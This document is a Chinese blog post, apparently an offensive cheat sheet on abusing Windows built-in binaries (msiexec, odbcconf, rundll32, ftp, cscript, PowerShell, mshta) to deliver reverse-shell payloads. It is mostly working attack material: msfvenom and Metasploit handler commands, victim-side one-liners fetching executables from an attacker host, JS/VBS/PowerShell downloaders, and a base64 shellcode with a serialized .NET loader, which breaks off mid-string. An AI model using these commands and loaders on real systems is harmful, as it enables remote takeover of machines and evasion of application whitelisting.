JS使用htef访问html文件,基于白名单的Payload

最新推荐文章于 2021-08-30 21:34:31 发布
最新推荐文章于 2021-08-30 21:34:31 发布
阅读量1.1k 收藏
点赞数
文章标签: JS使用htef访问html文件

利用 Msiexec 命令DLL反弹

Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便。

1.首先生成Payload.

[root@localhost ~]# msfvenom -p windows/x64/shell/reverse_tcp

> -b 'x00x0b' lhost=192.168.1.30 lport=8888

> -f dll > lyshark.dll

2.将Dll拷贝到目标主机,MSF主机执行命令,开启监听。

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) >

msf5 exploit(multi/handler) > set lhost 192.168.1.30

lhost => 192.168.1.7

msf5 exploit(multi/handler) > set lport 8888

lport => 8888

msf5 exploit(multi/handler) > exploit -j -z

3.客户端执行如下CMD命令,即可上线。

C:> msiexec -y C:UserslysharkDesktoplyshark.dll

C:> odbcconf.exe /a {regsvr C:lyshark.dll}

利用 Msiexec 命令反弹

Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便。

1.生成攻击载荷。

[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp

> -b 'x00x0b' lhost=192.168.1.30 lport=53

> -f msi > shell_recv.txt

2.攻击主机配置MSF

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp

payload => windows/x64/shell/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.30

lhost => 192.168.1.30

msf5 exploit(multi/handler) > set lport 8888

lport => 8888

msf5 exploit(multi/handler) > exploit -j -z

3.被攻击主机执行,如下命令.

C:// > msiexec.exe /q /i http://lyshark.com/shell_recv.txt

C:// > forfiles /p c:windowssystem32 /m cmd.exe /c "msiexec.exe /q /i http://192.168.1.30/shell_recv.txt"

利用 zipfldr.dll 文件反弹

zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件,同样该工具支持WinXP-Win10 全版本,zipfldr.dll所在路径已被系统添加PATH环境变量中,因此zipfldr.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行。

1.生成攻击载荷。

[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp

> -b 'x00x0b' lhost=192.168.1.30 lport=8888

> -f exe > shell.exe

2.攻击主机执行,监听。

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) >

msf5 exploit(multi/handler) > set lhost 192.168.1.30

lhost => 192.168.1.7

msf5 exploit(multi/handler) > set lport 8888

lport => 8888

msf5 exploit(multi/handler) > exploit -j -z

3.被攻击主机执行,如下命令。

C:// > rundll32.exe zipfldr.dll,RouteTheCall \192.168.1.30shell.exe

C:// > Pcalua -m -a \192.168.1.30shell.exe

利用 FTP命令反弹

FTP命令在微软系统中默认自带,我们需要搭建一个FTP服务器,默认用户名密码是 anonymous ,然后直接执行命令下载文件。

1.服务端生成后门文件 shell.exe 然后将其放入FTP根目录 /var/ftp/pub/

[root@localhost ~]# ls -lh /var/ftp/pub/

total 76K

-rw-r--r-- 1 root root 73K Aug 14 05:22 shell.exe

[root@localhost ~]# systemctl restart vsftpd

2.编写一个文件,命名为shell.log,其内部命令如下。

open 192.168.1.30 21

anonymous

anonymous

cd pub

binary

get shell.exe

bye

3.在被害主机执行 ftp -s:shell.log & shell.exe 命令,完成反弹工作。

C:> ftp -s:shell.log & shell.exe

# 如下一句话下载!

C:> echo open 192.168.1.30 > o&echo user 123 123 >> o &echo get shell.exe >> o &echo quit >> o &ftp ‐n ‐s:o &del /F /Q o

C:> echo open 192.168.1.30 > o&echo get shell.exe >> o &echo quit >> o &ftp ‐A ‐n ‐s:o &del /F /Q o

利用JS脚本下载

首先新建一个 down.js 文件,写入以下内容,其中shell.exe为后门可执行文件。

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");

WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);

WinHttpReq.Send();

BinStream = new ActiveXObject("ADODB.Stream");

BinStream.Type = 1;

BinStream.Open();

BinStream.Write(WinHttpReq.ResponseBody);

BinStream.SaveToFile("shell.exe");

在靶机执行如下命令下载文件。

C:// > cscript/nologo down.js http://lyshark.com & shell.exe

利用VBS脚本下载

通过echo 一句话回写,该命令不支持https下载。

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> down.vbs

在靶机执行如下命令下载文件。

cscript down.vbs http://lyshark.com/shell.exe c:shell.exe

Microsoft (R) Windows Script Host Version 5.812

升级版!

strFileURL = "http://lyshark/shell.exe"

strHDLocation = "c:shell.exe"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false

objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then

Set objADOStream = CreateObject("ADODB.Stream")

objADOStream.Open

objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody

objADOStream.Position = 0

Set objFSO = CreateObject("Scripting.FileSystemObject")

If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation

objADOStream.Close

Set objADOStream = Nothing

End if

Set objXMLHTTP = Nothing

PowerShell 一句话下载

将以下代码保存为 down.ps1 然后直接调用 powershell down.ps1

$url = "http://lyshark.com/shell.exe"

$output = "C:shell.exe"

$start_time = Get-Date

Invoke-WebRequest -Uri $url -OutFile $output

Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"

也可以简写!

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://shell.exe','c:shell.exe')

利用 Mshta 命令反弹

Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件,Mshta所在路径已被系统添加PATH环境变量中,因此,可直接执行Mshta.exe命令。

1.生成payload,这里要生成中间格式,这里就暂时生成 shell.bin

[root@localhost ~]# msfvenom -p windows/x64/shell/reverse_tcp

> -b 'x00x0b' lhost=192.168.1.30 lport=8888

> -f raw > shell.bin

2.使用base64算法,加密这串ShellCode代码。

[root@localhost ~]# ls -lh

total 4.0K

-rw-r--r-- 1 root root 551 Aug 14 03:47 shell.bin

[root@localhost ~]# cat shell.bin | base64 -w 0

SDHJSIHpwP///0iNBe9Iu9HsVMagt/UNSDFYJ0gt+P///+L0LaTXIlBfOQ3R7BWX4eenXIekZRTF/35fsaTflLj/fl/xpN+08P/6upumGfdp/8TNfdA1uqKb1UwQJVmHoXYX4IOtBY4r5dWGk9Acx3DRdHXJ51bJJcX1DdFn1E6gt/VFVCwgoei2JV1apEyCK/fVRNA8t5DoSDxMWtjcjqFhuDwYpGUGDPY0xNytVQeYV4D8ne8Y4qjyzNykNAyCK/fRRNA8Mocru71JWqxIj6FntIbVZBzHcPatTImyDZzh77RUkLYcRUyXtF8uDAyH+e29hsMFHzlfSKhEb5sn9P+Exw3RrQKPKVG9jD1MVcag/nzomFBWxoIPNaXQ8hWS6T4RQVgdFXzswNMKLjkYT0rf9AzR7A2HGp51ZtETgayq9qtdgaFlD+2GNUUuLBxPYv8KzZlllYcaXfrSMROBjilwnx2QtBhPQv989JBWzWPU1grYVCwgzOlIO3g0BMfGoLe9jj38HE9C+sTEu+gVnug+DExr7o0O/0ggjinsKpPoNDEtj2WirOD2rGXR/FTG4e+9hCOkZQ/hDa2pggmrE+g+NkRYKxn3af58/Zlljo4pTrS30zWcmV9idvXRkXye4eCsZdGsVMbh758Ni63uzY+4xfIEuw2HGsKbQLATgY9feRwxLhOrjqF0vSQXpNEw1QO08ja0Psb5/jLPIVn2kF9i9Q0=

3.将ShellCode代码复制下来,替换到如下ShellCode脚本,Dim code : code = "替换到此处"。

Dim binary : binary = "rundll32.exe"

' =========================================

Dim code : code = "SDHJSIHpwP///0iNBe9Iu9HsVMagt/UNSDFYJ0gt+P///+L0LaTXIlBfOQ3R7BWX4eenXIekZRTF/35fsaTflLj/fl/xpN+08P/6upumGfdp/8TNfdA1uqKb1UwQJVmHoXYX4IOtBY4r5dWGk9Acx3DRdHXJ51bJJcX1DdFn1E6gt/VFVCwgoei2JV1apEyCK/fVRNA8t5DoSDxMWtjcjqFhuDwYpGUGDPY0xNytVQeYV4D8ne8Y4qjyzNykNAyCK/fRRNA8Mocru71JWqxIj6FntIbVZBzHcPatTImyDZzh77RUkLYcRUyXtF8uDAyH+e29hsMFHzlfSKhEb5sn9P+Exw3RrQKPKVG9jD1MVcag/nzomFBWxoIPNaXQ8hWS6T4RQVgdFXzswNMKLjkYT0rf9AzR7A2HGp51ZtETgayq9qtdgaFlD+2GNUUuLBxPYv8KzZlllYcaXfrSMROBjilwnx2QtBhPQv989JBWzWPU1grYVCwgzOlIO3g0BMfGoLe9jj38HE9C+sTEu+gVnug+DExr7o0O/0ggjinsKpPoNDEtj2WirOD2rGXR/FTG4e+9hCOkZQ/hDa2pggmrE+g+NkRYKxn3af58/Zlljo4pTrS30zWcmV9idvXRkXye4eCsZdGsVMbh758Ni63uzY+4xfIEuw2HGsKbQLATgY9feRwxLhOrjqF0vSQXpNEw1QO08ja0Psb5/jLPIVn2kF9i9Q0="

' =========================================

' ---------- DO NOT EDIT BELOW HERE -----------

Sub Debug(s)

End Sub

Sub SetVersion

End Sub

Function Base64ToStream(b)

Dim enc, length, ba, transform, ms

Set enc = CreateObject("System.Text.ASCIIEncoding")

length = enc.GetByteCount_2(b)

Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")

Set ms = CreateObject("System.IO.MemoryStream")

ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)

ms.Position = 0

Set Base64ToStream = ms

End Function

Sub Run

Dim s, entry_class

s = "AAEAAAD/AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"

s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"

s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"

s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"

s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"

s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"

s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"

s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"

s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"

s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"

s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"

s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"

s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"

s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"

s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"

s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"

s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"

s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"

s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"

s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"

s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"

s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"

s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAAAA"

s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"

s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAIDUA"

s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"

s = s & "AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"

s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"

s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"

s = s & "MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"

s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"

s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAAAK"

s = s & "ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAAAK"

s = s & "EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9AgAA"

s = s & "BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAAQC"

s = s & "fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAigP"

s = s & "AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAAAj"

s = s & "fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAANwB"

s = s & "AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHwAA"

s = s & "ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAMkF"

s = s & "kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4QYG"

s = s & "AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL4I"

s = s & "qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACAAK"

s = s & "ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAAIB"

s = s & "AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPwAG"

s = s & "AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgPEB"

s = s & "AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAwFW"

s = s & "gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgDoD"

s = s & "AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPwAG"

s = s & "ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC4I"

s = s & "+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADgFW"

s = s & "gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgNUA"

s = s & "EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgACW"

s = s & "IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJEg"

s = s & "1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhhg+"

s = s & "BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAAkA"

s = s & "BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQcA"

s = s & "AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAAYA"

s = s & "CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEABB"

s = s & "AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAFMG"

s = s & "KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTAAJ"

s = s & "ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAEgA"

s = s & "hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAtAAJ"

s = s & "AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJAJQA"

s = s & "5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9QAJ"

s = s & "AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJADQB"

s = s & "aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAmAEu"

s = s & "ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDAHMA"

s = s & "WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1AMB"

s = s & "AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACAAYA"

s = s & "AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADxN"

s = s & "b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VURV9S"

s = s & "RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ0FU"

s = s & "RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPTlNP"

s = s & "TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX1dB"

s = s & "VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xF"

s = s & "VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNT"

s = s & "X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JP"

s = s & "VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDRURP"

s = s & "UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJ"

s = s & "VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklU"

s = s & "WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTUwBD"

s = s & "UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJP"

s = s & "Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5J"

s = s & "Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT19X"

s = s & "SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGRklO"

s = s & "SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwVGhy"

s = s & "ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABs"

s = s & "cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJbmhl"

s = s & "cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZQBW"

s = s & "YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1"

s = s & "dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJh"

s = s & "ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmli"

s = s & "dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0"

s = s & "cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNz"

s = s & "ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5"

s = s & "Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplAGR3"

s = s & "WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNI"

s = s & "RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3RyaW5n"

s = s & "AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ0FD"

s = s & "VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZXNz"

s = s & "SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJ"

s = s & "bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAbHBT"

s = s & "ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGlt"

s = s & "ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dp"

s = s & "bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJp"

s = s & "YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxh"

s = s & "Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBU"

s = s & "ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRB"

s = s & "ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU3Rk"

s = s & "SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3JpdGVQ"

s = s & "cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsaXR5"

s = s & "AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAcwBX"

s = s & "AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphXgAE"

s = s & "IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIBgAD"

s = s & "Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAAAAE"

s = s & "IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAABAAA"

s = s & "AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAAAAg"

